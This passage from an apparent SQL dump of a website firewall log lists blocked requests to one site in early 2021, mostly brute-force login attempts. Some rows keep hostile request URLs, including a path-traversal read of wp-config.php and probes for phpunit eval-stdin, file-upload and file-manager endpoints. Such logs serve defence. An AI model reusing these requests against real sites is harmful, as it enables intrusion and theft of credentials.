08:47:15','188.165.239.211','https://smithandsmith.co.za/wp-login.php','404shield',''),(3112,'2021-01-21 08:47:29','188.165.239.211','https://smithandsmith.co.za/wp-login.php','404shield',''),(3113,'2021-01-21 09:36:20','188.163.89.120','http://smithandsmith.co.za/administrator/','adminpw',''),(3114,'2021-01-21 10:08:38','51.210.39.30','https://smithandsmith.co.za/wp-admin/config.bak.php','404shield',''),(3115,'2021-01-21 10:08:48','51.210.39.30','https://smithandsmith.co.za/wp-admin/config.bak.php','404shield',''),(3116,'2021-01-21 10:09:32','51.210.39.30','https://www.smithandsmith.co.za/wp-admin/config.bak.php','404shield',''),(3117,'2021-01-21 11:53:39','188.165.239.211','https://smithandsmith.co.za//wp-login.php','404shield',''),(3118,'2021-01-21 11:55:03','188.165.239.211','https://smithandsmith.co.za//wp-login.php','404shield',''),(3119,'2021-01-21 11:55:58','188.165.239.211','https://smithandsmith.co.za//wp-login.php','404shield',''),(3120,'2021-01-21 18:23:44','188.165.239.211','https://smithandsmith.co.za//wp-login.php','404shield',''),(3121,'2021-01-21 18:24:16','188.165.239.211','https://smithandsmith.co.za//wp-login.php','404shield',''),(3122,'2021-01-21 18:24:16','188.165.239.211','https://smithandsmith.co.za//wp-login.php','404shield',''),(3123,'2021-01-21 19:27:36','64.202.189.187','https://smithandsmith.co.za/wp-login.php','404shield',''),(3124,'2021-01-22 01:34:10','146.59.250.180','https://smithandsmith.co.za/wp-admin/config.bak.php','404shield',''),(3125,'2021-01-22 01:34:22','146.59.250.180','https://smithandsmith.co.za/wp-admin/config.bak.php','404shield',''),(3126,'2021-01-22 01:34:42','146.59.250.180','https://www.smithandsmith.co.za/wp-admin/config.bak.php','404shield',''),(3127,'2021-01-22 03:31:10','186.179.100.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(3128,'2021-01-22 03:31:15','186.179.100.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(3129,'2021-01-22 03:31:20','186.179.100.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(3130,'2021-01-22 12:59:09','178.128.169.240','https://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(3131,'2021-01-22 13:00:02','178.128.169.240','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(3132,'2021-01-22 13:01:45','178.128.169.240','https://smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(3133,'2021-01-22 16:48:23','178.128.169.240','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','404shield',''),(3134,'2021-01-22 17:05:42','178.128.169.240','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','404shield',''),(3135,'2021-01-22 18:44:11','77.245.127.83','https://www.smithandsmith.co.za/wp-content/plugins/wp-special-textboxes/stb-uploader.php','404shield',''),(3136,'2021-01-22 19:46:29','178.128.169.240','https://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(3137,'2021-01-22 19:46:59','178.128.169.240','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(3138,'2021-01-22 19:47:34','178.128.169.240','https://www.smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(3139,'2021-01-23 07:31:08','34.215.69.55','https://smithandsmith.co.za/wp-login.php','404shield',''),(3140,'2021-01-23 07:31:10','34.215.69.55','https://smithandsmith.co.za/wp-login.php','404shield',''),(3141,'2021-01-23 09:42:10','23.29.80.56','https://smithandsmith.co.za/wp-login.php','404shield',''),(3142,'2021-01-23 12:21:05','193.138.194.190','https://smithandsmith.co.za/wp-login.php','404shield',''),(3143,'2021-01-23 12:21:10','193.138.194.190','https://smithandsmith.co.za/wp-login.php','404shield',''),(3144,'2021-01-23 12:21:13','193.138.194.190','https://smithandsmith.co.za/wp-login.php','404shield',''),(3145,'2021-01-24 14:42:30','34.236.18.197','https://smithandsmith.co.za/wp-login.php','404shield',''),(3146,'2021-01-24 14:42:32','34.236.18.197','https://smithandsmith.co.za/wp-login.php','404shield',''),(3147,'2021-01-24 18:13:55','165.22.23.23','https://smithandsmith.co.za/wp-login.php','404shield',''),(3148,'2021-01-24 18:13:56','165.22.23.23','https://smithandsmith.co.za/wp-login.php','404shield',''),(3149,'2021-01-25 05:53:52','18.231.94.162','https://smithandsmith.co.za/wp-login.php','404shield',''),(3150,'2021-01-25 05:53:54','18.231.94.162','https://smithandsmith.co.za/wp-login.php','404shield',''),(3151,'2021-01-25 09:38:53','52.60.189.115','https://smithandsmith.co.za/wp-login.php','404shield',''),(3152,'2021-01-25 09:38:55','52.60.189.115','https://smithandsmith.co.za/wp-login.php','404shield',''),(3153,'2021-01-25 17:23:49','13.58.56.77','https://smithandsmith.co.za/wp-login.php','404shield',''),(3154,'2021-01-25 17:24:04','13.58.56.77','https://smithandsmith.co.za/wp-login.php','404shield',''),(3155,'2021-01-26 04:19:00','178.128.169.240','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','404shield',''),(3156,'2021-01-26 04:38:53','178.128.169.240','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','404shield',''),(3157,'2021-01-26 05:04:30','165.22.242.39','https://smithandsmith.co.za/wp-login.php','404shield',''),(3158,'2021-01-27 02:51:33','187.58.151.15','https://smithandsmith.co.za/wp-login.php','404shield',''),(3159,'2021-01-27 02:51:40','187.58.151.15','https://smithandsmith.co.za/wp-login.php','404shield',''),(3160,'2021-01-27 02:51:47','187.58.151.15','https://smithandsmith.co.za/wp-login.php','404shield',''),(3161,'2021-01-27 05:43:57','51.91.76.214','https://smithandsmith.co.za/wp-login.php','404shield',''),(3162,'2021-01-28 01:19:45','185.239.242.29','https://smithandsmith.co.za/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(3163,'2021-01-28 01:19:47','185.239.242.29','https://smithandsmith.co.za/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(3164,'2021-01-28 01:20:21','185.239.242.29','https://smithandsmith.co.za/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(3165,'2021-01-28 02:43:51','185.239.242.29','https://www.smithandsmith.co.za/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(3166,'2021-01-28 02:43:54','185.239.242.29','https://www.smithandsmith.co.za/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(3167,'2021-01-28 02:44:22','185.239.242.29','https://www.smithandsmith.co.za/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(3168,'2021-01-28 03:41:18','67.205.57.71','https://smithandsmith.co.za/wp-login.php','404shield',''),(3169,'2021-01-28 04:38:32','186.215.198.137','https://smithandsmith.co.za/wp-login.php','404shield',''),(3170,'2021-01-28 04:38:38','186.215.198.137','https://smithandsmith.co.za/wp-login.php','404shield',''),(3171,'2021-01-28 04:38:45','186.215.198.137','https://smithandsmith.co.za/wp-login.php','404shield',''),(3172,'2021-01-29 04:13:43','167.99.156.117','https://smithandsmith.co.za/wp-login.php','404shield',''),(3173,'2021-01-29 04:13:43','167.99.156.117','https://smithandsmith.co.za/wp-login.php','404shield',''),(3174,'2021-01-29 10:11:28','104.219.232.114','https://www.smithandsmith.co.za//wp-login.php','404shield',''),(3175,'2021-01-29 10:11:31','104.219.232.114','http://www.smithandsmith.co.za//administrator/index.php','adminpw',''),(3176,'2021-01-29 10:11:44','104.219.232.114','https://www.smithandsmith.co.za//wp-admin/install.php?step=1','404shield',''),(3177,'2021-01-29 18:02:12','202.137.155.68','https://smithandsmith.co.za/wp-login.php','404shield',''),(3178,'2021-01-29 18:02:17','202.137.155.68','https://smithandsmith.co.za/wp-login.php','404shield',''),(3179,'2021-01-29 18:02:31','202.137.155.68','https://smithandsmith.co.za/wp-login.php','404shield',''),(3180,'2021-01-30 09:06:40','192.81.214.168','https://smithandsmith.co.za/wp-login.php','404shield',''),(3181,'2021-01-30 09:06:40','192.81.214.168','https://smithandsmith.co.za/wp-login.php','404shield',''),(3182,'2021-01-30 12:06:17','115.84.99.207','https://smithandsmith.co.za/wp-login.php','404shield',''),(3183,'2021-01-30 12:06:32','115.84.99.207','https://smithandsmith.co.za/wp-login.php','404shield',''),(3184,'2021-01-30 12:06:57','115.84.99.207','https://smithandsmith.co.za/wp-login.php','404shield',''),(3185,'2021-01-30 17:58:10','5.188.84.207','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3186,'2021-01-30 17:58:15','195.158.195.27','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3187,'2021-01-30 17:58:52','138.128.19.8','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3188,'2021-01-30 17:58:57','45.92.20.234','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3189,'2021-01-30 18:07:05','78.60.111.211','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(3190,'2021-01-30 20:45:21','121.160.83.14','https://smithandsmith.co.za/wp-login.php','404shield',''),(3191,'2021-01-30 20:45:39','121.160.83.14','http://smithandsmith.co.za/administrator/','adminpw',''),(3192,'2021-01-31 17:56:47','173.236.144.82','https://smithandsmith.co.za/wp-login.php','404shield',''),(3193,'2021-02-01 09:27:34','91.218.15.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(3194,'2021-02-01 09:27:35','91.218.15.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(3195,'2021-02-01 09:27:35','91.218.15.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(3196,'2021-02-01 11:30:45','115.84.92.92','https://smithandsmith.co.za/wp-login.php','404shield',''),(3197,'2021-02-01 11:30:55','115.84.92.92','https://smithandsmith.co.za/wp-login.php','404shield',''),(3198,'2021-02-01 11:31:11','115.84.92.92','https://smithandsmith.co.za/wp-login.php','404shield',''),(3199,'2021-02-01 12:30:29','104.219.232.114','https://www.smithandsmith.co.za//wp-login.php','404shield',''),(3200,'2021-02-01 12:30:33','104.219.232.114','http://www.smithandsmith.co.za//administrator/index.php','adminpw',''),(3201,'2021-02-01 12:30:57','104.219.232.114','https://www.smithandsmith.co.za//wp-admin/install.php?step=1','404shield',''),(3202,'2021-02-01 15:57:55','92.244.247.37','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3203,'2021-02-01 18:33:19','41.202.174.9','https://smithandsmith.co.za/wp-login.php','404shield',''),(3204,'2021-02-01 18:33:58','41.202.174.9','https://smithandsmith.co.za/wp-login.php','404shield',''),(3205,'2021-02-01 18:34:30','41.202.174.9','https://smithandsmith.co.za/wp-login.php','404shield',''),(3206,'2021-02-01 18:47:33','92.244.247.37','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3207,'2021-02-01 18:51:10','118.98.90.22','https://smithandsmith.co.za/wp-login.php','404shield',''),(3208,'2021-02-01 18:51:16','118.98.90.22','https://smithandsmith.co.za/wp-login.php','404shield',''),(3209,'2021-02-01 18:51:23','118.98.90.22','https://smithandsmith.co.za/wp-login.php','404shield',''),(3210,'2021-02-02 00:38:33','202.137.155.212','https://smithandsmith.co.za/wp-login.php','404shield',''),(3211,'2021-02-02 00:38:59','202.137.155.212','https://smithandsmith.co.za/wp-login.php','404shield',''),(3212,'2021-02-02 00:39:30','202.137.155.212','https://smithandsmith.co.za/wp-login.php','404shield',''),(3213,'2021-02-02 06:45:12','51.178.136.52','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3214,'2021-02-02 07:14:17','178.128.169.240','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(3215,'2021-02-02 10:34:53','178.128.169.240','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(3216,'2021-02-02 10:39:05','178.128.169.240','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(3217,'2021-02-02 16:38:30','91.218.15.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(3218,'2021-02-02 16:38:30','91.218.15.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(3219,'2021-02-02 16:38:30','91.218.15.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(3220,'2021-02-02 22:07:30','63.250.36.139','https://smithandsmith.co.za/wp-login.php','404shield',''),(3221,'2021-02-03 11:12:18','34.236.18.197','https://smithandsmith.co.za/wp-login.php','404shield',''),(3222,'2021-02-03 15:08:48','20.55.23.103','http://smithandsmith.co.za/','muashield',''),(3223,'2021-02-03 15:08:48','20.55.23.103','http://smithandsmith.co.za/','muashield',''),(3224,'2021-02-03 15:08:55','20.55.23.103','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(3225,'2021-02-04 01:03:32','149.202.59.123','https://smithandsmith.co.za/wp-login.php','404shield',''),(3226,'2021-02-04 07:58:53','82.165.49.62','http://smithandsmith.co.za/','muashield',''),(3227,'2021-02-04 07:58:54','82.165.49.62','http://smithandsmith.co.za//','muashield',''),(3228,'2021-02-04 07:58:57','82.165.49.62','http://smithandsmith.co.za//index.php/component/users','sessionshield',''),(3229,'2021-02-04 12:56:24','91.218.15.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(3230,'2021-02-04 12:56:25','91.218.15.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(3231,'2021-02-04 12:56:25','91.218.15.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(3232,'2021-02-04 19:26:34','146.59.203.207','https://smithandsmith.co.za/wp-content/db-cache.php','404shield',''),(3233,'2021-02-04 19:26:42','146.59.203.207','https://smithandsmith.co.za/wp-content/db-cache.php','404shield',''),(3234,'2021-02-05 04:33:48','202.137.155.94','https://smithandsmith.co.za/wp-login.php','404shield',''),(3235,'2021-02-05 04:34:27','202.137.155.94','https://smithandsmith.co.za/wp-login.php','404shield',''),(3236,'2021-02-05 04:34:52','202.137.155.94','https://smithandsmith.co.za/wp-login.php','404shield',''),(3237,'2021-02-05 09:34:15','132.148.28.20','https://smithandsmith.co.za/wp-login.php','404shield',''),(3238,'2021-02-05 22:15:05','37.97.152.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(3239,'2021-02-06 03:18:24','52.15.212.3','https://smithandsmith.co.za/wp-login.php','404shield',''),(3240,'2021-02-06 12:44:53','35.181.87.238','https://smithandsmith.co.za/wp-login.php','404shield',''),(3241,'2021-02-07 01:21:12','91.218.15.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(3242,'2021-02-07 01:21:12','91.218.15.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(3243,'2021-02-07 01:21:12','91.218.15.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(3244,'2021-02-07 17:07:05','67.205.58.218','https://smithandsmith.co.za/wp-login.php','404shield',''),(3245,'2021-02-07 17:07:06','67.205.58.218','https://smithandsmith.co.za/wp-login.php','404shield',''),(3246,'2021-02-07 19:21:52','84.53.192.243','http://smithandsmith.co.za/index.php?option=com_mailto&tmpl=component&template=beez_20&link=aHR0cDovL2xvY2FsaG9zdC9qL2luZGV4LnBocD94PXkgSGFpIEkgYW0gYSBzcGFtIG1lc3NhZ2UhIFdvdWxkIHlvdSBsaWtlIHRvIGJ1eSBhbGwgc29ydHMgb2YgZmFrZSBzdHVmZj8gU1BBTSBTUEFNIFNQQU0=','template',''),(3247,'2021-02-08 02:30:20','52.64.20.252','https://smithandsmith.co.za/wp-login.php','404shield',''),(3248,'2021-02-08 06:00:51','191.102.120.63','https://smithandsmith.co.za/wp-login.php','404shield',''),(3249,'2021-02-08 06:01:08','191.102.120.63','https://smithandsmith.co.za/wp-login.php','404shield',''),(3250,'2021-02-08 06:01:13','191.102.120.63','https://smithandsmith.co.za/wp-login.php','404shield',''),(3251,'2021-02-08 07:18:11','52.52.190.187','https://smithandsmith.co.za/wp-login.php','404shield',''),(3252,'2021-02-08 10:46:22','188.243.124.19','https://smithandsmith.co.za/contact','sqlishield',''),(3253,'2021-02-08 12:57:21','5.188.62.214','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(3254,'2021-02-09 04:42:33','13.236.114.230','https://smithandsmith.co.za/wp-login.php','404shield',''),(3255,'2021-02-09 13:04:54','79.135.82.11','http://smithandsmith.co.za/','muashield',''),(3256,'2021-02-09 13:05:21','79.135.82.11','http://smithandsmith.co.za/','muashield',''),(3257,'2021-02-09 18:10:40','79.135.82.11','https://smithandsmith.co.za/index.php/component/users','sessionshield',''),(3258,'2021-02-10 04:56:20','79.135.82.11','https://smithandsmith.co.za/index.php/component/users','sessionshield',''),(3259,'2021-02-10 07:14:38','178.234.35.26','https://smithandsmith.co.za/wp-login.php','404shield',''),(3260,'2021-02-10 07:14:42','178.234.35.26','https://smithandsmith.co.za/wp-login.php','404shield',''),(3261,'2021-02-10 07:14:45','178.234.35.26','https://smithandsmith.co.za/wp-login.php','404shield',''),(3262,'2021-02-10 09:51:15','52.65.15.196','https://smithandsmith.co.za/wp-login.php','404shield',''),(3263,'2021-02-10 13:51:47','92.244.208.235','https://smithandsmith.co.za/index.php/component/users','sessionshield',''),(3264,'2021-02-11 13:09:50','115.84.99.207','https://smithandsmith.co.za/wp-login.php','404shield',''),(3265,'2021-02-11 13:10:00','115.84.99.207','https://smithandsmith.co.za/wp-login.php','404shield',''),(3266,'2021-02-11 13:10:11','115.84.99.207','https://smithandsmith.co.za/wp-login.php','404shield',''),(3267,'2021-02-11 21:48:06','89.232.34.130','https://smithandsmith.co.za/wp-login.php','404shield',''),(3268,'2021-02-11 21:48:10','89.232.34.130','https://smithandsmith.co.za/wp-login.php','404shield',''),(3269,'2021-02-11 21:48:13','89.232.34.130','https://smithandsmith.co.za/wp-login.php','404shield',''),(3270,'2021-02-12 01:01:48','79.135.82.11','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(3271,'2021-02-12 05:41:23','79.135.82.11','https://smithandsmith.co.za/','muashield',''),(3272,'2021-02-12 05:41:24','79.135.82.11','https://smithandsmith.co.za/','muashield',''),(3273,'2021-02-12 05:41:43','79.135.82.11','https://smithandsmith.co.za/accesson2.php','muashield',''),(3274,'2021-02-12 15:28:52','23.228.109.147','https://smithandsmith.co.za/wp-admin/css/ie.css','404shield',''),(3275,'2021-02-13 03:12:11','14.161.42.137','https://smithandsmith.co.za/wp-login.php','404shield',''),(3276,'2021-02-13 03:12:33','14.161.42.137','https://smithandsmith.co.za/wp-login.php','404shield',''),(3277,'2021-02-13 03:12:51','14.161.42.137','https://smithandsmith.co.za/wp-login.php','404shield',''),(3278,'2021-02-13 13:12:03','115.84.92.243','https://smithandsmith.co.za/wp-login.php','404shield',''),(3279,'2021-02-13 13:12:28','115.84.92.243','https://smithandsmith.co.za/wp-login.php','404shield',''),(3280,'2021-02-13 13:13:00','115.84.92.243','https://smithandsmith.co.za/wp-login.php','404shield',''),(3281,'2021-02-13 20:57:30','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php','404shield',''),(3282,'2021-02-14 17:08:14','188.19.123.164','https://smithandsmith.co.za/wp-login.php','404shield',''),(3283,'2021-02-14 17:08:17','188.19.123.164','https://smithandsmith.co.za/wp-login.php','404shield',''),(3284,'2021-02-14 17:08:21','188.19.123.164','https://smithandsmith.co.za/wp-login.php','404shield',''),(3285,'2021-02-14 17:31:16','113.161.88.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(3286,'2021-02-14 17:31:23','113.161.88.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(3287,'2021-02-14 17:31:29','113.161.88.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(3288,'2021-02-14 17:44:18','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/whatsmyrank-devenc/php-ofc-library/ofc_upload_image.php','404shield',''),(3289,'2021-02-15 03:49:33','23.101.179.112','https://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(3290,'2021-02-15 16:15:10','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','404shield',''),(3291,'2021-02-16 00:51:55','202.137.154.125','https://smithandsmith.co.za/wp-login.php','404shield',''),(3292,'2021-02-16 00:52:02','202.137.154.125','https://smithandsmith.co.za/wp-login.php','404shield',''),(3293,'2021-02-16 00:52:13','202.137.154.125','https://smithandsmith.co.za/wp-login.php','404shield',''),(3294,'2021-02-16 06:55:25','210.16.189.4','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3295,'2021-02-16 08:18:13','173.236.144.82','https://smithandsmith.co.za/wp-login.php','404shield',''),(3296,'2021-02-16 10:50:56','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wpwhatsmyrankvideoregular-unlimited/php-ofc-library/ofc_upload_image.php','404shield',''),(3297,'2021-02-17 12:07:47','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-business-intelligence-lite/resources/open-flash-chart/php-ofc-library/ofc_upload_image.php','404shield',''),(3298,'2021-02-17 17:09:49','145.239.29.217','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3299,'2021-02-17 19:31:38','174.138.30.233','https://smithandsmith.co.za/wp-login.php','404shield',''),(3300,'2021-02-17 19:31:38','174.138.30.233','https://smithandsmith.co.za/wp-login.php','404shield',''),(3301,'2021-02-18 08:05:52','139.155.87.149','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3302,'2021-02-18 14:25:34','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php','404shield',''),(3303,'2021-02-18 15:06:49','116.203.62.173','https://smithandsmith.co.za/wp-login.php','404shield',''),(3304,'2021-02-18 15:06:49','116.203.62.173','https://smithandsmith.co.za/wp-login.php','404shield',''),(3305,'2021-02-19 15:25:16','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-slimstat-ex/lib/ofc/php-ofc-library/ofc_upload_image.php','404shield',''),(3306,'2021-02-19 20:52:29','158.69.248.120','https://smithandsmith.co.za/wp-login.php','404shield',''),(3307,'2021-02-20 02:15:42','115.84.99.207','https://smithandsmith.co.za/wp-login.php','404shield',''),(3308,'2021-02-20 02:15:54','115.84.99.207','https://smithandsmith.co.za/wp-login.php','404shield',''),(3309,'2021-02-20 02:16:07','115.84.99.207','https://smithandsmith.co.za/wp-login.php','404shield',''),(3310,'2021-02-20 16:20:16','148.66.129.72','https://smithandsmith.co.za/wp-login.php','404shield',''),(3311,'2021-02-20 16:20:17','148.66.129.72','https://smithandsmith.co.za/wp-login.php','404shield',''),(3312,'2021-02-20 17:20:35','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-seo-spy-google/ofc/php-ofc-library/ofc_upload_image.php','404shield',''),(3313,'2021-02-20 18:37:02','194.31.252.136','https://smithandsmith.co.za/wp-login.php','404shield',''),(3314,'2021-02-20 18:37:05','194.31.252.136','https://smithandsmith.co.za/wp-login.php','404shield',''),(3315,'2021-02-20 18:37:09','194.31.252.136','https://smithandsmith.co.za/wp-login.php','404shield',''),(3316,'2021-02-22 10:07:15','191.102.120.63','https://smithandsmith.co.za/wp-login.php','404shield',''),(3317,'2021-02-22 10:07:26','191.102.120.63','https://smithandsmith.co.za/wp-login.php','404shield',''),(3318,'2021-02-22 10:07:37','191.102.120.63','https://smithandsmith.co.za/wp-login.php','404shield',''),(3319,'2021-02-22 19:25:27','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/faaad-admin2/public/assets/js/jQuery-File-Upload-master-bl/server/php/index.php','404shield',''),(3320,'2021-02-22 20:19:33','82.99.244.4','https://smithandsmith.co.za/wp-login.php','404shield',''),(3321,'2021-02-22 20:19:33','82.99.244.4','https://smithandsmith.co.za/wp-login.php','404shield',''),(3322,'2021-02-23 11:44:36','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/ip-logger/chart/ofc_upload_image.php','404shield',''),(3323,'2021-02-24 06:49:33','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/open-flash-chart-core-wordpress-plugin/open-flash-chart-2/php-ofc-library/ofc_upload_image.php','404shield',''),(3324,'2021-02-24 15:49:15','170.254.87.22','https://smithandsmith.co.za/wp-login.php','404shield',''),(3325,'2021-02-24 15:49:21','170.254.87.22','https://smithandsmith.co.za/wp-login.php','404shield',''),(3326,'2021-02-24 15:49:28','170.254.87.22','https://smithandsmith.co.za/wp-login.php','404shield',''),(3327,'2021-02-24 18:29:52','192.81.214.168','https://smithandsmith.co.za/wp-login.php','404shield',''),(3328,'2021-02-24 21:28:19','79.135.82.11','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(3329,'2021-02-25 06:43:28','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/spamtask/chart/php-ofc-library/ofc_upload_image.php','404shield',''),(3330,'2021-02-26 06:00:50','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/seo-spy-google-wordpress-plugin/ofc/php-ofc-library/ofc_upload_image.php','404shield',''),(3331,'2021-02-26 11:34:33','178.137.16.56','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3332,'2021-02-26 11:34:36','178.137.16.56','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3333,'2021-02-26 11:34:38','178.137.16.56','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3334,'2021-02-26 17:49:31','13.53.64.97','https://smithandsmith.co.za/wp-login.php','404shield',''),(3335,'2021-02-26 19:16:27','213.149.103.132','https://smithandsmith.co.za/wp-login.php','404shield',''),(3336,'2021-02-27 02:44:05','208.113.193.247','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3337,'2021-02-27 13:12:22','113.173.4.49','https://smithandsmith.co.za/wp-login.php','404shield',''),(3338,'2021-02-27 13:12:27','113.173.4.49','https://smithandsmith.co.za/wp-login.php','404shield',''),(3339,'2021-02-27 13:12:33','113.173.4.49','https://smithandsmith.co.za/wp-login.php','404shield',''),(3340,'2021-02-27 18:14:39','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php','404shield',''),(3341,'2021-02-27 22:28:37','104.209.199.191','https://smithandsmith.co.za//wp-content/plugins/easy-wp-smtp/','404shield',''),(3342,'2021-02-27 22:28:41','104.209.199.191','https://www.smithandsmith.co.za//wp-content/plugins/easy-wp-smtp/','404shield',''),(3343,'2021-02-27 23:31:20','177.126.216.110','https://smithandsmith.co.za/wp-login.php','404shield',''),(3344,'2021-02-27 23:31:30','177.126.216.110','https://smithandsmith.co.za/wp-login.php','404shield',''),(3345,'2021-02-27 23:31:35','177.126.216.110','https://smithandsmith.co.za/wp-login.php','404shield',''),(3346,'2021-02-28 12:44:12','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php','404shield',''),(3347,'2021-02-28 15:59:46','144.208.75.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(3348,'2021-02-28 15:59:46','144.208.75.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(3349,'2021-02-28 17:48:04','91.121.183.89','https://smithandsmith.co.za/wp-admin/user/config.bak.php','404shield',''),(3350,'2021-02-28 17:50:04','91.121.183.89','https://smithandsmith.co.za/wp-admin/user/config.bak.php','404shield',''),(3351,'2021-03-01 16:25:11','173.236.193.48','https://smithandsmith.co.za/wp-login.php','404shield',''),(3352,'2021-03-01 19:39:35','191.97.4.147','https://smithandsmith.co.za/wp-login.php','404shield',''),(3353,'2021-03-01 19:39:40','191.97.4.147','https://smithandsmith.co.za/wp-login.php','404shield',''),(3354,'2021-03-01 19:39:45','191.97.4.147','https://smithandsmith.co.za/wp-login.php','404shield',''),(3355,'2021-03-02 06:20:15','198.27.69.184','https://smithandsmith.co.za/wp-login.php','404shield',''),(3356,'2021-03-02 06:22:39','198.27.69.184','https://smithandsmith.co.za/wp-login.php','404shield',''),(3357,'2021-03-02 06:24:51','198.27.69.184','https://smithandsmith.co.za/wp-login.php','404shield',''),(3358,'2021-03-02 07:06:12','34.236.18.197','https://smithandsmith.co.za/wp-login.php','404shield',''),(3359,'2021-03-02 17:16:54','109.24.144.155','https://smithandsmith.co.za/wp-login.php','404shield',''),(3360,'2021-03-02 17:29:59','14.162.164.172','https://smithandsmith.co.za/wp-login.php','404shield',''),(3361,'2021-03-02 17:30:08','14.162.164.172','https://smithandsmith.co.za/wp-login.php','404shield',''),(3362,'2021-03-02 17:30:16','14.162.164.172','https://smithandsmith.co.za/wp-login.php','404shield',''),(3363,'2021-03-02 18:33:38','198.27.69.184','https://smithandsmith.co.za/wp-login.php','404shield',''),(3364,'2021-03-02 18:35:08','198.27.69.184','https://smithandsmith.co.za/wp-login.php','404shield',''),(3365,'2021-03-02 18:36:51','198.27.69.184','https://smithandsmith.co.za/wp-login.php','404shield',''),(3366,'2021-03-03 03:09:47','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php','404shield',''),(3367,'2021-03-03 11:29:26','54.250.87.247','https://smithandsmith.co.za/wp-login.php','404shield',''),(3368,'2021-03-03 17:39:46','158.69.248.120','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3369,'2021-03-03 19:37:44','216.177.141.15','https://smithandsmith.co.za/wp-login.php','404shield',''),(3370,'2021-03-04 12:30:27','13.48.53.51','https://smithandsmith.co.za/wp-login.php','404shield',''),(3371,'2021-03-05 